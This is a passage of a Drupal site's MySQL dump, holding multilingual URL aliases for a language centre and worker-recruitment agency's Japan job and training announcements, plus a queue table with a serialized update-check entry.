(410, 410, 'ko', '/node/25', '/content/uliui-bijyeon-uliui-misyeon', 1, 1),
(411, 411, 'ja', '/node/26', '/content/huishenomubiao', 1, 1),
(412, 412, 'en', '/node/26', '/content/future-goal', 1, 1),
(413, 413, 'ko', '/node/26', '/content/hoesaui-milae-bijeon', 1, 1),
(414, 414, 'ja', '/node/27', '/content/huisheyange', 1, 1),
(415, 415, 'en', '/node/27', '/content/company-history', 1, 1),
(416, 416, 'ko', '/node/27', '/content/company-history', 1, 1),
(417, 417, 'ja', '/node/28', '/activities/hit-language-center-hanew-comet-trading', 1, 1),
(418, 418, 'en', '/node/28', '/activities/hit-language-center-has-started-teaching-korean-language-courses-and-japanese-language', 1, 1),
(419, 419, 'ko', '/node/28', '/activities/hit-language-center-neun-new-comet-trading-agencywaui-hyeoblyeogeulo-hangugeo-koseuwa', 1, 1),
(420, 420, 'ja', '/node/29', '/activities/new-comet-trading-agencynohanguocedandangzhemrhongkahit-language-centertekoshipa', 1, 1),
(421, 421, 'en', '/node/29', '/activities/person-charge-korean-side-new-comet-trading-agency-mrhong-explained-question-when-you', 1, 1),
(422, 422, 'ko', '/node/29', '/activities/new-comet-trading-agencyui-hangug-cheug-damdangjain-hongssiga-hit-language-centereseo', 1, 1),
(423, 423, 'ja', '/node/30', '/announcement/yixianoshulianlaodongzhewoshinkahorutejinjiniqiumeteimasu', 1, 1),
(424, 424, 'en', '/node/30', '/announcement/we-urgently-need-following-skilled-workers-work-singapore', 1, 1),
(425, 425, 'ko', '/node/30', '/announcement/gingeubhage-daeumgwa-gateun-suglyeon-nodongjadeuli-singgapoleueseo-ilhal-pilyoga', 1, 1),
(426, 426, 'en', '/node/31', '/announcement/we-are-looking-professional-welders-who-wants-work-korean-shipyards', 1, 1),
(427, 427, 'en', '/node/66', '/announcement/exciting-news-japanese-language-enthusiasts', 1, 1),
(428, 428, 'ja', '/node/67', '/activities/wishing-everyone-happy-new-day', 1, 1),
(429, 429, 'ja', '/node/68', '/activities/congratulations-22-4-2024', 1, 1),
(430, 430, 'en', '/node/68', '/activities/congratulations-22-4-2024', 1, 1),
(431, 431, 'ja', '/node/69', '/activities/congratulations-9-4-2024', 1, 1),
(432, 432, 'en', '/node/69', '/activities/congratulations-9-4-2024', 1, 1),
(433, 433, 'ja', '/node/70', '/activities/congrats', 1, 1),
(434, 434, 'en', '/node/70', '/activities/congrats', 1, 1),
(435, 435, 'ja', '/node/71', '/activities/congratulations', 1, 1),
(436, 436, 'en', '/node/71', '/activities/congratulations', 1, 1),
(437, 437, 'ja', '/node/72', '/activities/congratulations-0', 1, 1),
(438, 438, 'en', '/node/72', '/activities/congratulations-0', 1, 1),
(439, 439, 'ja', '/node/73', '/activities/congratulations-19-5-2024', 1, 1),
(440, 440, 'en', '/node/73', '/activities/congratulations-19-5-2024', 1, 1),
(441, 441, 'ja', '/node/74', '/activities/congratulations-1', 1, 1),
(442, 442, 'en', '/node/74', '/activities/congratulations-1', 1, 1),
(443, 443, 'ja', '/node/75', '/activities/chit-sayah-oosanometetoukosaimasu', 1, 1),
(444, 444, 'en', '/node/75', '/activities/congratulations-chit-sayah-oo', 1, 1),
(445, 445, 'ja', '/node/76', '/activities/congratulations-19-5-2024-0', 1, 1),
(446, 446, 'en', '/node/76', '/activities/congratulations-19-5-2024-0', 1, 1),
(447, 447, 'ja', '/node/77', '/activities/congratulations-25-6-2024', 1, 1),
(448, 448, 'en', '/node/77', '/activities/congratulations-25-6-2024', 1, 1),
(449, 449, 'ja', '/node/78', '/activities/congratulations-13-6-2024', 1, 1),
(450, 450, 'en', '/node/78', '/activities/congratulations-13-6-2024', 1, 1),
(451, 451, 'en', '/node/79', '/activities/congratulations-2-6-2024', 1, 1),
(452, 452, 'ja', '/node/80', '/activities/congratulations-2-6-2024', 1, 1),
(453, 453, 'en', '/node/80', '/activities/congratulations-2-6-2024-0', 1, 1),
(454, 454, 'ja', '/node/81', '/activities/congratulations-passing-interview-kaung-myat-soe', 1, 1),
(455, 455, 'en', '/node/81', '/activities/congratulations-passing-interview-kaung-myat-soe', 1, 1),
(456, 456, 'ja', '/node/82', '/activities/myo-khantometetoukosaimasu', 1, 1),
(457, 457, 'en', '/node/82', '/activities/congratulations-myo-khant', 1, 1),
(458, 458, 'ja', '/node/83', '/activities/congratulation-getting-coe', 1, 1),
(459, 459, 'en', '/node/83', '/activities/congratulation-getting-coe', 1, 1),
(460, 460, 'ja', '/node/84', '/activities/ye-mong-aungometetoukosaimasu', 1, 1),
(461, 461, 'en', '/node/84', '/activities/congratulations-ye-mong-aung', 1, 1),
(462, 462, 'ja', '/node/85', '/activities/congratulations-paing-myo-zaw', 1, 1),
(463, 463, 'en', '/node/85', '/activities/congratulations-paing-myo-zaw', 1, 1),
(464, 464, 'ja', '/node/86', '/activities/congratulations-getting-coe', 1, 1),
(465, 465, 'en', '/node/86', '/activities/congratulations-getting-coe', 1, 1),
(466, 466, 'ja', '/node/87', '/activities/things-beware-while-working-japan', 1, 1),
(467, 467, 'en', '/node/87', '/activities/things-beware-while-working-japan', 1, 1),
(468, 468, 'ja', '/node/88', '/activities/congratulation-getting-coe-0', 1, 1),
(469, 469, 'en', '/node/88', '/activities/congratulation-getting-coe-0', 1, 1),
(470, 470, 'ja', '/node/89', '/activities/congratulations-getting-coe-0', 1, 1),
(471, 471, 'en', '/node/89', '/activities/congratulations-getting-coe-0', 1, 1),
(472, 472, 'ja', '/node/90', '/activities/chaw-chit-kyawometetoukosaimasu', 1, 1),
(473, 473, 'en', '/node/90', '/activities/congratulations-chaw-chit-kyaw', 1, 1),
(474, 474, 'ja', '/node/91', '/activities/congratulations-getting-coe-1', 1, 1),
(475, 475, 'en', '/node/91', '/activities/congratulations-getting-coe-1', 1, 1),
(476, 476, 'ja', '/node/92', '/activities/congratulations-getting-coe-2', 1, 1),
(477, 477, 'en', '/node/92', '/activities/congratulations-getting-coe-2', 1, 1),
(478, 478, 'ja', '/node/93', '/activities/congratulations-getting-coe-3', 1, 1),
(479, 479, 'en', '/node/93', '/activities/congratulations-getting-coe-ometetou-ya-min-thet-santo-shin-thant-phyu-sancoe', 1, 1),
(480, 480, 'en', '/node/94', '/activities/congratulations-getting-coe-3', 1, 1),
(481, 481, 'ja', '/node/95', '/activities/activities-2nd-batch-job-trainingrestaurant', 1, 1),
(482, 482, 'en', '/node/95', '/activities/activities-3th-batch-job-trainingrestaurant', 1, 1),
(483, 483, 'ja', '/node/96', '/activities/congralutations-getting-coe', 1, 1),
(484, 484, 'en', '/node/96', '/activities/congralutations-getting-coe', 1, 1),
(485, 485, 'ja', '/node/97', '/activities/congralutations-getting-coe-0', 1, 1),
(486, 486, 'en', '/node/97', '/activities/congralutations-getting-coe-0', 1, 1),
(487, 487, 'ja', '/node/98', '/activities/2nd-batch-pratical-class-restaurant', 1, 1),
(488, 488, 'en', '/node/98', '/activities/2nd-batch-pratical-class-restaurant', 1, 1),
(489, 489, 'ja', '/node/99', '/activities/congralutations-getting-coe-1', 1, 1),
(490, 490, 'en', '/node/99', '/activities/congralutations-getting-coe-1', 1, 1),
(491, 491, 'ja', '/node/100', '/activities/congratulations-bo-bo-zaw', 1, 1),
(492, 492, 'en', '/node/100', '/activities/congratulations-bo-bo-zaw', 1, 1),
(493, 493, 'ja', '/node/101', '/activities/congratulations-yamin-phyo', 1, 1),
(494, 494, 'en', '/node/101', '/activities/congratulations-yamin-phyo', 1, 1),
(495, 495, 'ja', '/node/102', '/activities/congrats-thae-su-yati-soe', 1, 1),
(496, 496, 'en', '/node/102', '/activities/congrats-thae-su-yati-soe', 1, 1),
(497, 497, 'ja', '/node/103', '/activities/congratulations-getting-coe-4', 1, 1),
(498, 498, 'en', '/node/103', '/activities/congratulations-getting-coe-4', 1, 1),
(499, 499, 'ja', '/node/104', '/activities/congratulations-khaing-sapal-oo', 1, 1),
(500, 500, 'en', '/node/104', '/activities/congratulations-khaing-sapal-oo', 1, 1),
(501, 501, 'ja', '/node/105', '/activities/congratulations-getting-coe-5', 1, 1),
(502, 502, 'en', '/node/105', '/activities/congratulations-getting-coe-5', 1, 1),
(503, 503, 'ja', '/node/106', '/activities/congrats-khaing-thaw-thaw-khant', 1, 1),
(504, 504, 'en', '/node/106', '/activities/congrats-khaing-thaw-thaw-khant', 1, 1),
(505, 505, 'ja', '/node/107', '/activities/congratulations-pyae-sone-thu', 1, 1),
(506, 506, 'en', '/node/107', '/activities/congratulations-pyae-sone-thu', 1, 1),
(507, 507, 'ja', '/node/108', '/activities/congratulations-getting-coe-6', 1, 1),
(508, 508, 'en', '/node/108', '/activities/congratulations-getting-coe-6', 1, 1),
(509, 509, 'ja', '/node/109', '/activities/congrats-chan-myae-thu', 1, 1),
(510, 510, 'en', '/node/109', '/activities/congrats-chan-myae-thu', 1, 1),
(511, 511, 'ja', '/node/110', '/activities/congratulations-yaw-chang', 1, 1),
(512, 512, 'en', '/node/110', '/activities/congratulations-yaw-chang', 1, 1),
(513, 513, 'ja', '/node/111', '/activities/congratulations19-5-2024', 1, 1),
(514, 514, 'en', '/node/111', '/activities/congratulations19-5-2024', 1, 1),
(515, 515, 'ja', '/node/112', '/activities/congrats-adin-min-maw-min-khant-kyaw', 1, 1),
(516, 516, 'en', '/node/112', '/activities/congrats-adin-min-maw-min-khant-kyaw', 1, 1),
(517, 517, 'ja', '/node/113', '/activities/congratulations29-5-2024', 1, 1),
(518, 518, 'en', '/node/113', '/activities/congratulations29-5-2024', 1, 1),
(519, 519, 'ja', '/node/114', '/activities/congrats-yu-mon-aung-may-myo-khaing', 1, 1),
(520, 520, 'en', '/node/114', '/activities/congrats-yu-mon-aung-may-myo-khaing', 1, 1),
(521, 521, 'ja', '/node/115', '/activities/congrats-li-soung-oo-thandar-moe-khu-richard-pyae-sone-aung', 1, 1),
(522, 522, 'en', '/node/115', '/activities/congrats-li-soung-oo-thandar-moe-khu-richard-pyae-sone-aung', 1, 1),
(523, 523, 'ja', '/node/116', '/activities/images-2th-batch-resturtant-internship', 1, 1),
(524, 524, 'en', '/node/116', '/activities/images-2th-batch-resturtant-internship', 1, 1),
(525, 525, 'ja', '/node/117', '/activities/congrats-ei-eaindra-aung', 1, 1),
(526, 526, 'en', '/node/117', '/activities/congrats-ei-eaindra-aung', 1, 1),
(527, 527, 'ja', '/node/118', '/activities/congrats-aung-thura', 1, 1),
(528, 528, 'en', '/node/118', '/activities/congrats-aung-thura', 1, 1),
(529, 529, 'ja', '/node/119', '/activities/congrats-thatoe-aung', 1, 1),
(530, 530, 'en', '/node/119', '/activities/congrats-thatoe-aung', 1, 1),
(531, 531, 'ja', '/node/120', '/activities/bosss-treatment-celebrate-interview-passed-student', 1, 1),
(532, 532, 'en', '/node/120', '/activities/bosss-treatment-celebrate-interview-passed-student', 1, 1),
(533, 533, 'ja', '/node/121', '/activities/congrats-yee-yee-thant-nay-lin-aung', 1, 1),
(534, 534, 'en', '/node/121', '/activities/congrats-yee-yee-thant-nay-lin-aung', 1, 1),
(535, 535, 'ja', '/node/122', '/activities/1th-batch-internship-sushi-resturtant-21-2-2024', 1, 1),
(536, 536, 'en', '/node/122', '/activities/1th-batch-internship-sushi-resturtant-21-2-2024', 1, 1),
(537, 537, 'ja', '/node/123', '/activities/congrats-khin-yu-mon-phyo-thae-ei-phyu', 1, 1),
(538, 538, 'en', '/node/123', '/activities/congrats-khin-yu-mon-phyo-thae-ei-phyu', 1, 1),
(539, 539, 'ja', '/node/124', '/activities/congrats-thura-kyaw', 1, 1),
(540, 540, 'en', '/node/124', '/activities/congrats-thura-kyaw', 1, 1),
(541, 541, 'ja', '/node/125', '/activities/congrats-may-thingyan-htun-naw-nay-dar-palu', 1, 1),
(542, 542, 'en', '/node/125', '/activities/congrats-may-thingyan-htun-naw-nay-dar-palu', 1, 1),
(543, 543, 'ja', '/node/126', '/activities/arrival-japan10-4-2024', 1, 1),
(544, 544, 'en', '/node/126', '/activities/arrival-japan10-4-2024', 1, 1),
(545, 545, 'ja', '/node/127', '/activities/congrats-yu-wai-phyo-soe-sandar-htwe-pann-ei-zaw', 1, 1),
(546, 546, 'en', '/node/127', '/activities/congrats-yu-wai-phyo-soe-sandar-htwe-pann-ei-zaw', 1, 1),
(547, 547, 'ja', '/node/128', '/activities/congrats-nan-thae-nu-soe-ei-ei-min-hlaing-mee-mee-htike-pyae-su-su-san', 1, 1),
(548, 548, 'en', '/node/128', '/activities/congrats-nan-thae-nu-soe-ei-ei-min-hlaing-mee-mee-htike-pyae-su-su-san', 1, 1),
(549, 549, 'ja', '/node/129', '/activities/congrats-kay-thari-toe-may-hla-myo-nila-aung', 1, 1),
(550, 550, 'en', '/node/129', '/activities/congrats-kay-thari-toe-may-hla-myo-nila-aung', 1, 1),
(551, 551, 'ja', '/node/130', '/activities/congrats-0', 1, 1),
(552, 552, 'en', '/node/130', '/activities/congrats-0', 1, 1),
(553, 553, 'ja', '/node/131', '/activities/congrats-kyaw-zin-latt', 1, 1),
(554, 554, 'en', '/node/131', '/activities/congrats-kyaw-zin-latt', 1, 1),
(555, 555, 'ja', '/node/132', '/activities/congratulations-yin-may-thu-yamin-shwe-zin', 1, 1),
(556, 556, 'en', '/node/132', '/activities/congratulations-yin-may-thu-yamin-shwe-zin', 1, 1),
(557, 557, 'ja', '/node/133', '/activities/2nd-batch-pratical-class-completion', 1, 1),
(558, 558, 'en', '/node/133', '/activities/2nd-batch-pratical-class-completion', 1, 1),
(559, 559, 'ja', '/node/134', '/activities/congratulations-7-peson-passing-interview', 1, 1),
(560, 560, 'en', '/node/134', '/activities/congratulations-7-peson-passing-interview', 1, 1),
(561, 561, 'ja', '/node/135', '/activities/purpose-pratical-training', 1, 1),
(562, 562, 'en', '/node/135', '/activities/purpose-pratical-training', 1, 1),
(563, 563, 'ja', '/node/136', '/activities/pratical-nursing-class', 1, 1),
(564, 564, 'en', '/node/136', '/activities/pratical-nursing-class', 1, 1),
(565, 565, 'ja', '/node/137', '/activities/congratulations-nang-bwar-kyi-phray-myar-kaw-myar', 1, 1),
(566, 566, 'en', '/node/137', '/activities/congratulations-nang-bwar-kyi-phray-myar-kaw-myar', 1, 1),
(567, 567, 'ja', '/node/138', '/activities/1st-batch-speaking-and-pratical-class-completion', 1, 1),
(568, 568, 'en', '/node/138', '/activities/1st-batch-speaking-and-pratical-class-completion', 1, 1),
(569, 569, 'ja', '/node/139', '/activities/congratulations-hnin-wah-khaing-lay-lay-naing', 1, 1),
(570, 570, 'en', '/node/139', '/activities/congratulations-hnin-wah-khaing-lay-lay-naing', 1, 1),
(571, 571, 'ja', '/node/140', '/activities/1st-batch-theoretical-class-15-students', 1, 1),
(572, 572, 'en', '/node/140', '/activities/1st-batch-theoretical-class-15-students', 1, 1),
(573, 573, 'ja', '/node/141', '/activities/congrats-ei-ei-nyein-thu-zar-aung-bue-myar-shar', 1, 1),
(574, 574, 'en', '/node/141', '/activities/congrats-ei-ei-nyein-thu-zar-aung-bue-myar-shar', 1, 1),
(575, 575, 'ja', '/node/142', '/activities/commencement-new-comet-language-centre', 1, 1),
(576, 576, 'en', '/node/142', '/activities/commencement-new-comet-language-centre', 1, 1),
(577, 577, 'ja', '/node/143', '/activities/congratulations-hnin-wai-wai-nwe-thida-khine', 1, 1),
(578, 578, 'en', '/node/143', '/activities/congratulations-hnin-wai-wai-nwe-thida-khine', 1, 1),
(579, 579, 'ja', '/node/144', '/activities/congratulations-aung-zin-oo-htet-wai-aung-htun-naing', 1, 1),
(580, 580, 'en', '/node/144', '/activities/congratulations-aung-zin-oo-htet-wai-aung-htun-naing', 1, 1),
(581, 581, 'ja', '/node/145', '/activities/congratulations-getting-coe-7', 1, 1),
(582, 582, 'en', '/node/145', '/activities/congratulations-getting-coe-7', 1, 1),
(583, 583, 'ja', '/node/146', '/activities/congratulations-passing-interview', 1, 1),
(584, 584, 'en', '/node/146', '/activities/congratulations-thet-htar-myint-ko-hsu-myat-hmue-hnin-yu-hlaing-wai-wai-khaing-chaw-hsu', 1, 1),
(585, 585, 'ja', '/node/147', '/activities/congratulations-kyaw-zin-latt-getting-coe', 1, 1),
(586, 586, 'en', '/node/147', '/activities/congratulations-kyaw-zin-latt-getting-coe', 1, 1),
(587, 587, 'ja', '/node/148', '/activities/congratulations-getting-coe-8', 1, 1),
(588, 588, 'en', '/node/148', '/activities/congratulations-getting-coe-8', 1, 1),
(589, 589, 'en', '/node/149', '/activities/congratulations-passing-interview', 1, 1),
(590, 590, 'ja', '/node/150', '/activities/training-about-cprkaigo', 1, 1),
(591, 591, 'en', '/node/150', '/activities/training-about-cprkaigo', 1, 1),
(592, 592, 'ja', '/node/151', '/activities/congratulations-getting-coe-9', 1, 1),
(593, 593, 'en', '/node/151', '/activities/congratulations-getting-coe-9', 1, 1),
(594, 594, 'ja', '/node/152', '/activities/congratulation-getting-coe-1', 1, 1),
(595, 595, 'en', '/node/152', '/activities/congratulation-getting-coe-1', 1, 1),
(596, 596, 'ja', '/node/153', '/activities/congratulations-getting-coe-10', 1, 1),
(597, 597, 'en', '/node/153', '/activities/congratulations-getting-coe-10', 1, 1),
(598, 598, 'ja', '/node/154', '/activities/tedingjinengjiehurencai5ming-ribenchufanoozhirase', 1, 1),
(599, 599, 'en', '/node/154', '/activities/five-caregiver-workers-departed-japan-under-specified-skilled-worker-kaigo-program', 1, 1),
(600, 600, 'ja', '/node/155', '/announcement/hoterufenye-tedingjinengshiyanduicekurasukaijiangnoozhirase', 1, 1),
(601, 601, 'en', '/node/155', '/announcement/new-hotel-tokutei-preparation-class-now-open', 1, 1),
(602, 602, 'ja', '/node/156', '/activities/chuguobaogao-tedingjinengwaishiyeteribenhechufashimashita', 1, 1),
(603, 603, 'en', '/node/156', '/activities/departure-japan-specified-skilled-worker-food-service-industry', 1, 1),
(604, 604, 'ja', '/node/157', '/activities/chuguobaogao-tedingjinengwaishiyete9mingkaribenhechufashimashita', 1, 1),
(605, 605, 'en', '/node/157', '/activities/group-departure-japan-specified-skilled-worker-food-service-industry', 1, 1),
(606, 606, 'ja', '/node/160', '/activities/tedingjinengwaishiyemianjiehegenokobaogao', 1, 1),
(607, 607, 'en', '/node/160', '/activities/candidate-successfully-passed-tokutei-food-service-interview', 1, 1),
(608, 608, 'ja', '/node/161', '/activities/tedingjinengwaishiyemianjiehegenoozhirase', 1, 1),
(609, 609, 'en', '/node/161', '/activities/candidate-successfully-passed-tokutei-food-service-interview-0', 1, 1),
(610, 610, 'ja', '/node/162', '/announcement/aizhixian-fangwenjiehusutatsufumujitedingjinengjiehu', 1, 1),
(611, 611, 'en', '/node/162', '/announcement/home-care-caregiver-position-available-aichi-japan', 1, 1),
(612, 612, 'ja', '/node/163', '/announcement/tedingjinengnongyesutatsufumujicichengxiantsukuhashi', 1, 1),
(613, 613, 'en', '/node/163', '/announcement/agriculture-workers-wanted-tokutei-program-japan', 1, 1),
(614, 614, 'ja', '/node/164', '/activities/tedingjinengsuporencai-ribenchufanoozhirase', 1, 1),
(615, 615, 'en', '/node/164', '/activities/hotel-worker-begins-career-journey-japan', 1, 1),
(616, 616, 'ja', '/node/165', '/activities/tedingjinengjiehurencai4ming-ribenchufanoozhirase', 1, 1),
(617, 617, 'en', '/node/165', '/activities/four-caregiver-workers-departed-japan', 1, 1),
(618, 618, 'ja', '/node/166', '/activities/tedingjinengsupomianjiehegenoozhirase', 1, 1),
(619, 619, 'en', '/node/166', '/activities/candidate-successfully-passed-tokutei-hotel-interview', 1, 1),
(620, 620, 'ja', '/node/167', '/activities/tedingjinengwaishiyerencai4ming-ribenchufanoozhirase', 1, 1),
(621, 621, 'en', '/node/167', '/activities/four-food-service-workers-departed-japan', 1, 1),
(622, 622, 'ja', '/node/168', '/activities/tedingjinengsupomianjiehegenoozhirase-0', 1, 1),
(623, 623, 'en', '/node/168', '/activities/candidate-successfully-passed-tokutei-hotel-interview-0', 1, 1),
(624, 624, 'ja', '/node/169', '/activities/tedingjinengjiehurencai3ming-ribenchufanoozhirase', 1, 1),
(625, 625, 'en', '/node/169', '/activities/three-caregiver-workers-departed-japan', 1, 1),
(626, 626, 'ja', '/node/170', '/activities/tedingjinengjiehumianjiehegenoozhirase', 1, 1),
(627, 627, 'en', '/node/170', '/activities/candidate-successfully-passed-tokutei-kaigo-interview', 1, 1),
(628, 628, 'ja', '/node/171', '/activities/tedingjinengjiehurencai-ribenchufanoozhirase', 1, 1),
(629, 629, 'en', '/node/171', '/activities/caregiver-begins-new-career-journey-japan', 1, 1),
(630, 630, 'ja', '/node/173', '/activities/tedingjinengwaishiyerencai9ming-xintanakiyariahenochufa', 1, 1),
(631, 631, 'en', '/node/173', '/activities/nine-food-service-workers-begin-their-new-careers-japan', 1, 1),
(632, 632, 'ja', '/node/174', '/activities/tedingjinengwaishiyerencai-ribentenoxintanasutato', 1, 1),
(633, 633, 'en', '/node/174', '/activities/new-opportunity-begins-japans-food-service-industry', 1, 1),
(634, 634, 'ja', '/node/175', '/activities/tedingjinengwaishiyerencai-ribentenoxintanatiaozhan', 1, 1),
(635, 635, 'en', '/node/175', '/activities/starting-new-journey-japans-food-service-industry', 1, 1),
(636, 636, 'ja', '/node/176', '/activities/tedingjinengwaishiyerencai2ming-ribenchufanoozhirase', 1, 1),
(637, 637, 'en', '/node/176', '/activities/two-food-service-workers-set-japan', 1, 1),
(638, 638, 'ja', '/node/177', '/activities/tedingjinengwaishiyerencai-ribentenoxintanayibu', 1, 1),
(639, 639, 'en', '/node/177', '/activities/food-service-worker-begins-new-chapter-japan', 1, 1),
(640, 640, 'ja', '/node/178', '/activities/tedingjinengjiehumianjiehegenoozhirase-0', 1, 1),
(641, 641, 'en', '/node/178', '/activities/successful-step-toward-caregiving-career-japan', 1, 1),
(642, 642, 'ja', '/node/179', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-0', 1, 1),
(643, 643, 'en', '/node/179', '/activities/successful-food-service-interview-result', 1, 1),
(644, 644, 'ja', '/node/180', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-1', 1, 1),
(645, 645, 'en', '/node/180', '/activities/food-service-candidate-achieves-interview-success', 1, 1),
(646, 646, 'ja', '/node/181', '/activities/jlpt-n3hegenoozhirase', 1, 1),
(647, 647, 'en', '/node/181', '/activities/student-successfully-passed-jlpt-n3-examination', 1, 1),
(648, 648, 'ja', '/node/182', '/activities/n5karan3he-xuexichengguonokobaogao', 1, 1),
(649, 649, 'en', '/node/182', '/activities/n5-n3-successful-learning-journey', 1, 1),
(650, 650, 'ja', '/node/183', '/activities/jlpt-n3hegeniyoriguangkaruxintanakenengxing', 1, 1),
(651, 651, 'en', '/node/183', '/activities/jlpt-n3-success-opens-new-opportunities', 1, 1),
(652, 652, 'ja', '/node/184', '/activities/tedingjinengwaishiyerencai2ming-ribenchufanoozhirase-0', 1, 1),
(653, 653, 'en', '/node/184', '/activities/two-food-service-workers-depart-japan-after-months-preparation', 1, 1),
(654, 654, 'ja', '/node/185', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-2', 1, 1),
(655, 655, 'en', '/node/185', '/activities/food-service-candidate-successfully-advances-next-stage', 1, 1),
(656, 656, 'ja', '/node/186', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-3', 1, 1),
(657, 657, 'en', '/node/186', '/activities/food-service-candidate-demonstrates-readiness-career-japan', 1, 1),
(658, 658, 'ja', '/node/187', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-4', 1, 1),
(659, 659, 'en', '/node/187', '/activities/promising-future-begins-interview-success', 1, 1),
(660, 660, 'ja', '/node/188', '/activities/tedingjinengjiehumianjiehegenoozhirase-1', 1, 1),
(661, 661, 'en', '/node/188', '/activities/successful-interview-result-future-caregiver-japan', 1, 1),
(662, 662, 'ja', '/node/189', '/activities/tedingjinengjiehumianjiehegenoozhirase-2', 1, 1),
(663, 663, 'en', '/node/189', '/activities/commitment-and-dedication-lead-interview-success', 1, 1),
(664, 664, 'ja', '/node/190', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-5', 1, 1),
(665, 665, 'en', '/node/190', '/activities/preparation-and-determination-lead-interview-success', 1, 1),
(666, 666, 'ja', '/node/191', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-6', 1, 1),
(667, 667, 'en', '/node/191', '/activities/hard-work-recognized-through-interview-success', 1, 1),
(668, 668, 'ja', '/node/192', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-7', 1, 1),
(669, 669, 'en', '/node/192', '/activities/persistence-and-dedication-result-interview-success', 1, 1),
(670, 670, 'ja', '/node/193', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-8', 1, 1),
(671, 671, 'en', '/node/193', '/activities/interview-success-marks-beginning-new-opportunities', 1, 1),
(672, 672, 'ja', '/node/194', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-9', 1, 1),
(673, 673, 'en', '/node/194', '/activities/successful-interview-opens-door-international-experience', 1, 1),
(674, 674, 'ja', '/node/195', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-10', 1, 1),
(675, 675, 'en', '/node/195', '/activities/building-skills-and-opportunities-through-success', 1, 1),
(676, 676, 'ja', '/node/196', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-11', 1, 1),
(677, 677, 'en', '/node/196', '/activities/determination-leads-interview-success', 1, 1),
(678, 678, 'ja', '/node/197', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-12', 1, 1),
(679, 679, 'en', '/node/197', '/activities/interview-success-opens-new-possibilities-japan', 1, 1),
(680, 680, 'ja', '/node/198', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-13', 1, 1),
(681, 681, 'en', '/node/198', '/activities/significant-achievement-toward-career-japan', 1, 1),
(682, 682, 'ja', '/node/199', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-14', 1, 1),
(683, 683, 'en', '/node/199', '/activities/turning-effort-success-interview-passed', 1, 1),
(684, 684, 'ja', '/node/200', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-15', 1, 1),
(685, 685, 'en', '/node/200', '/activities/ready-next-challenge-interview-successfully-passed', 1, 1),
(686, 686, 'ja', '/node/204', '/language-center/title-1', 1, 1),
(687, 687, 'en', '/node/204', '/language-center/title-1', 1, 1),
(688, 688, 'ja', '/node/205', '/language-center/title-2', 1, 1),
(689, 689, 'en', '/node/205', '/language-center/title-2', 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `queue`
--

CREATE TABLE `queue` (
  `item_id` int UNSIGNED NOT NULL COMMENT 'Primary Key: Unique item ID.',
  `name` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The queue name.',
  `data` longblob COMMENT 'The arbitrary data for the item.',
  `expire` bigint NOT NULL DEFAULT '0' COMMENT 'Timestamp when the claim lease expires on the item.',
  `created` bigint NOT NULL DEFAULT '0' COMMENT 'Timestamp when the item was created.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Stores items in queues.';

--
-- Dumping data for table `queue`
--

INSERT INTO `queue` (`item_id`, `name`, `data`, `expire`, `created`) VALUES
(10606, 'update_fetch_tasks', 0x613a363a7b733a343a226e616d65223b733a363a2264727570616c223b733a343a22696e666f223b613a363a7b733a343a226e616d65223b733a31343a224175746f6d617465642043726f6e223b733a373a227061636b616765223b733a343a22436f7265223b733a373a2276657273696f6e223b733a373a2231302e362e3135223b733a373a2270726f6a656374223b733a363a2264727570616c223b733a393a22646174657374616d70223b693a313738363031313138363b733a31363a225f696e666f5f66696c655f6374696d65223b693a313738363731353232393b7d733a393a22646174657374616d70223b693a313738363031313138363b733a383a22696e636c75646573223b613a35313a7b733a31343a226175746f6d617465645f63726f6e223b733a31343a224175746f6d617465642043726f6e223b733a383a226269675f70697065223b733a373a2242696750697065223b733a353a22626c6f636b223b733a353a22426c6f636b223b733a31333a22626c6f636b5f636f6e74656e74223b733a31333a22426c6f636b20436f6e74656e74223b733a31303a22627265616b706f696e74223b733a31303a22427265616b706f696e74223b733a393a22636b656469746f7235223b733a31303a22434b456469746f722035223b733a373a22636f6d6d656e74223b733a373a22436f6d6d656e74223b733a363a22636f6e666967223b733a32313a22436f6e66696775726174696f6e204d616e61676572223b733a31383a22636f6e6669675f7472616e736c6174696f6e223b733a32353a22436f6e66696775726174696f6e205472616e736c6174696f6e223b733a373a22636f6e74616374223b733a373a22436f6e74616374223b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b733a31393a22436f6e74656e74205472616e736c6174696f6e223b733a31303a22636f6e7465787475616c223b733a31363a22436f6e7465787475616c204c696e6b73223b733a383a226461746574696d65223b733a383a224461746574696d65223b733a353a2264626c6f67223b733a31363a224461746162617365204c6f6767696e67223b733a31383a2264796e616d69635f706167655f6361636865223b733a32373a22496e7465726e616c2044796e616d69632050616765204361636865223b733a363a22656469746f72223b733a31313a225465787420456469746f72223b733a353a226669656c64223b733a353a224669656c64223b733a383a226669656c645f7569223b733a383a224669656c64205549223b733a343a2266696c65223b733a343a2246696c65223b733a363a2266696c746572223b733a363a2246696c746572223b733a343a2268656c70223b733a343a2248656c70223b733a373a22686973746f7279223b733a373a22486973746f7279223b733a353a22696d616765223b733a353a22496d616765223b733a383a226c616e6775616765223b733a383a224c616e6775616765223b733a343a226c696e6b223b733a343a224c696e6b223b733a363a226c6f63616c65223b733a32313a22496e74657266616365205472616e736c6174696f6e223b733a353a226d65646961223b733a353a224d65646961223b733a31333a226d656469615f6c696272617279223b733a31333a224d65646961204c696272617279223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b733a31373a22437573746f6d204d656e75204c696e6b73223b733a373a226d656e755f7569223b733a373a224d656e75205549223b733a353a226d7973716c223b733a353a224d7953514c223b733a343a226e6f6465223b733a343a224e6f6465223b733a373a226f7074696f6e73223b733a373a224f70746